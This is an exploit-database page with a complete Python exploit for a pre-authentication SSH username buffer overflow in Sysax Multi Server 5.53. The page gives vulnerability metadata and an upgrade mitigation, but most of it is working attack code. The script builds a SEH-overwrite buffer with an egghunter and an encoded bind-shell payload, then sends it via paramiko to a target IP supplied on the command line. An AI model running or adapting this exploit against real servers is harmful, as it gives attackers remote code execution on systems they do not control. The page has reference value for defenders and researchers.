header-logo
Suggest Exploit
vendor:
Sysax Multi Server
by:
Craig Freyman
9
CVSS
CRITICAL
The exploit allows remote attackers to execute arbitrary code via a long SSH username, which triggers a buffer overflow in the username field of the SSH handshake process.
119
CWE
Product Name: Sysax Multi Server
Affected Version From: <= 5.53
Affected Version To: 5.53
Patch Exists: YES
Related CWE: CVE-2012-1000
CPE: a:sysax:sysax_multi_server:5.53
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 32-bit, Windows 2003 Server SP2 (No DEP)

Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)

The exploit allows remote attackers to execute arbitrary code via a long SSH username, which triggers a buffer overflow in the username field of the SSH handshake process.

Mitigation:

Upgrade to Sysax version 5.55 or later.
Source

Exploit-DB raw data:

#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)
#Author: Craig Freyman (@cd1zz)
#OS Tested: XP SP3 32bit, 2003 Server SP2 (No DEP)
#Software Versions Tested: 5.53, 5.52, 5.50
#Date Discovered: Febrary 22, 2012
#Vendor Contacted: Febrary 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Sysax 5.55
#Detailed Exploit Description:http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
##########################################################################################################
import paramiko,os,sys
if len(sys.argv) != 3:
    print "[+] Usage: ./filename <Target IP> <Port>"
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
"\x5a\x74\xef\xb8\x44\x4e\x57\x50\x8b\xfa\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
# msfpayload  windows/shell_bind_tcp LPORT=4444 R | msfencode -e -e x86/alpha_mixed X
shell = ("DNWPDNWP"
"\x89\xe0\xda\xdf\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49\x49" 
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" 
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" 
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" 
"\x42\x75\x4a\x49\x69\x6c\x68\x68\x6d\x59\x77\x70\x57\x70" 
"\x57\x70\x33\x50\x4f\x79\x39\x75\x70\x31\x7a\x72\x62\x44" 
"\x4c\x4b\x52\x72\x70\x30\x6e\x6b\x32\x72\x44\x4c\x4c\x4b" 
"\x36\x32\x74\x54\x6e\x6b\x71\x62\x34\x68\x64\x4f\x78\x37" 
"\x42\x6a\x76\x46\x54\x71\x39\x6f\x35\x61\x49\x50\x4e\x4c" 
"\x77\x4c\x61\x71\x31\x6c\x66\x62\x64\x6c\x75\x70\x39\x51" 
"\x58\x4f\x34\x4d\x66\x61\x4f\x37\x6b\x52\x6c\x30\x73\x62" 
"\x30\x57\x4c\x4b\x36\x32\x64\x50\x4c\x4b\x63\x72\x77\x4c" 
"\x57\x71\x7a\x70\x6e\x6b\x61\x50\x72\x58\x6f\x75\x79\x50" 
"\x61\x64\x50\x4a\x63\x31\x48\x50\x30\x50\x4c\x4b\x53\x78" 
"\x56\x78\x6e\x6b\x50\x58\x51\x30\x35\x51\x59\x43\x69\x73" 
"\x57\x4c\x73\x79\x4c\x4b\x47\x44\x6e\x6b\x47\x71\x79\x46" 
"\x44\x71\x4b\x4f\x35\x61\x79\x50\x6c\x6c\x39\x51\x5a\x6f" 
"\x76\x6d\x47\x71\x78\x47\x75\x68\x6b\x50\x33\x45\x39\x64" 
"\x64\x43\x73\x4d\x4c\x38\x37\x4b\x31\x6d\x45\x74\x64\x35" 
"\x39\x72\x32\x78\x4c\x4b\x30\x58\x45\x74\x47\x71\x48\x53" 
"\x50\x66\x4c\x4b\x36\x6c\x42\x6b\x4e\x6b\x56\x38\x75\x4c" 
"\x47\x71\x39\x43\x4e\x6b\x56\x64\x4e\x6b\x33\x31\x68\x50" 
"\x6b\x39\x70\x44\x76\x44\x77\x54\x43\x6b\x71\x4b\x35\x31" 
"\x36\x39\x30\x5a\x30\x51\x4b\x4f\x4d\x30\x70\x58\x31\x4f" 
"\x42\x7a\x4c\x4b\x55\x42\x6a\x4b\x4d\x56\x63\x6d\x70\x68" 
"\x50\x33\x36\x52\x45\x50\x67\x70\x70\x68\x31\x67\x31\x63" 
"\x45\x62\x71\x4f\x31\x44\x61\x78\x52\x6c\x62\x57\x51\x36" 
"\x53\x37\x59\x6f\x4b\x65\x6f\x48\x6e\x70\x56\x61\x67\x70" 
"\x77\x70\x76\x49\x68\x44\x43\x64\x50\x50\x73\x58\x45\x79" 
"\x6b\x30\x32\x4b\x65\x50\x49\x6f\x49\x45\x62\x70\x72\x70" 
"\x76\x30\x70\x50\x53\x70\x66\x30\x67\x30\x46\x30\x45\x38" 
"\x48\x6a\x36\x6f\x39\x4f\x59\x70\x39\x6f\x78\x55\x4e\x69" 
"\x49\x57\x36\x51\x6b\x6b\x52\x73\x50\x68\x56\x62\x77\x70" 
"\x66\x71\x31\x4c\x4f\x79\x6b\x56\x51\x7a\x36\x70\x72\x76" 
"\x32\x77\x65\x38\x4b\x72\x6b\x6b\x64\x77\x71\x77\x4b\x4f" 
"\x4e\x35\x50\x53\x56\x37\x73\x58\x6c\x77\x38\x69\x37\x48" 
"\x69\x6f\x39\x6f\x78\x55\x63\x63\x30\x53\x31\x47\x62\x48" 
"\x30\x74\x78\x6c\x57\x4b\x79\x71\x6b\x4f\x79\x45\x76\x37" 
"\x4c\x49\x6f\x37\x55\x38\x73\x45\x72\x4e\x50\x4d\x43\x51" 
"\x39\x6f\x59\x45\x73\x58\x42\x43\x50\x6d\x43\x54\x75\x50" 
"\x4d\x59\x59\x73\x70\x57\x30\x57\x73\x67\x36\x51\x38\x76" 
"\x51\x7a\x57\x62\x42\x79\x36\x36\x5a\x42\x6b\x4d\x31\x76" 
"\x49\x57\x61\x54\x47\x54\x37\x4c\x67\x71\x53\x31\x4c\x4d" 
"\x67\x34\x77\x54\x74\x50\x7a\x66\x37\x70\x51\x54\x52\x74" 
"\x52\x70\x71\x46\x70\x56\x43\x66\x32\x66\x50\x56\x42\x6e" 
"\x50\x56\x46\x36\x61\x43\x43\x66\x53\x58\x73\x49\x58\x4c" 
"\x37\x4f\x4d\x56\x4b\x4f\x78\x55\x6f\x79\x69\x70\x30\x4e" 
"\x50\x56\x51\x56\x39\x6f\x76\x50\x61\x78\x63\x38\x4e\x67" 
"\x67\x6d\x71\x70\x59\x6f\x49\x45\x6d\x6b\x68\x70\x4f\x45" 
"\x4e\x42\x62\x76\x72\x48\x4c\x66\x4e\x75\x6d\x6d\x6d\x4d" 
"\x6b\x4f\x6a\x75\x37\x4c\x63\x36\x63\x4c\x45\x5a\x6f\x70" 
"\x39\x6b\x39\x70\x52\x55\x37\x75\x6d\x6b\x63\x77\x75\x43" 
"\x74\x32\x72\x4f\x51\x7a\x77\x70\x50\x53\x69\x6f\x38\x55" 
"\x41\x41")
padding1 = "\x90" * 50
padding2 = "\x90" * 50
nseh = "\x90\x90\xeb\x80"	
seh =  "\x69\x26\x40\x00"	#00402669 PPR sysaxservd.exe
junk = "A" * (9204 - len(egghunter + padding1 + padding2 + shell))
buff = junk + shell + padding1 + egghunter + padding2 + nseh + seh
print "============================================================================"
print "                 Sysax <= 5.53 SSH Username BoF Pre Auth RCE                "
print "                                  by cd1zz                                  "
print "                               www.pwnag3.com                               "
print "============================================================================"
try:
	transport = paramiko.Transport((host, port))	
except:
	print "[X] Unable to connect to " + host + " on port " + str(port)
	sys.exit(1)
transport = paramiko.Transport((host, port))
print "[+] Launching exploit against " + host + " on port " + str(port)
print "[+] Done!"
transport.connect(username = buff, password = "pwnag3")	
transport.close()